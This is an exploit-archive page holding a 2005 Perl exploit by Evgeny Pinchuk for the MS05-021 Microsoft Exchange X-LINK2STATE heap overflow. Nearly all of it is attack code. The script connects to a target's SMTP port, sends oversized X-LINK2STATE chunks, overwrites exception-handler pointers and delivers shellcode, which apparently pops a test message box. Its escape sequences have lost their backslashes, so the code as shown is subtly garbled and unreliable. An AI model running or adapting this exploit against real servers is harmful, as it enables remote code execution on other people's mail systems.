MS Exchange Server Remote Code Execution Exploit (MS05-021)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Exchange Server Remote Code Execution Exploit (MS05-021)
# Published : 2005-04-19
# Author : Evgeny Pinchuk
# Previous Title : PMsoftware Simple Web Server 1.0 Remote Stack Overflow Exploit
# Next Title : Mozilla Browsers x (Link) Code Execution Exploit

#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
# 
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
# 
# Thanks and greets: 
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
# 
#

use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
my $EAX="x55xB2xD3x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll) 
my $ECX="xF0xA1x5Cx7C"; # lpTopLevelExceptionFilter
my $JMP="xEBx10";


my $SC="x31xc0x31xdbx31xc9x31xd2xebx37x59x88x51x0axbbxD5x01" .
"x59x7Cx51xffxd3xebx39x59x31xd2x88x51x0bx51x50xbbx5F" .
"x0Cx59x7Cxffxd3xebx39x59x31xd2x88x51x0Dx31xd2x52x51" .
"x51x52xffxd0x31xd2x50xb8x72x69x59x7Cxffxd0xe8xc4xff" .
"xffxffx75x73x65x72x33x32x2ex64x6cx6cx4exe8xc2xffxff" .
"xffx4dx65x73x73x61x67x65x42x6fx78x41x4exe8xc2xffxff" .
"xffx4Dx53x30x35x2Dx30x32x31x20x54x65x73x74x4e";

my $cmd="X-LINK2STATE CHUNK=";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLOrn";
send $socket, $request, 0;
print "[+] Sent EHLOn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "rn";
send $socket, $request, 0;
print "[+] Sent 1st chunkn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "A"x30 . $JMP . $EAX . $ECX . "B"x100 . $SC;
my $left=1000-length($request);
$request = $request . "C"x$left;
$request = $cmd . $request . "rn";
send $socket, $request, 0;
print "[+] Sent 2nd chunkn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
close $socket;
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLOrn";
send $socket, $request, 0;
print "[+] Sent EHLOn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "rn";
send $socket, $request, 0;
print "[+] Sent 3rd chunkn";

close $socket;

# www.Syue.com [2005-04-19]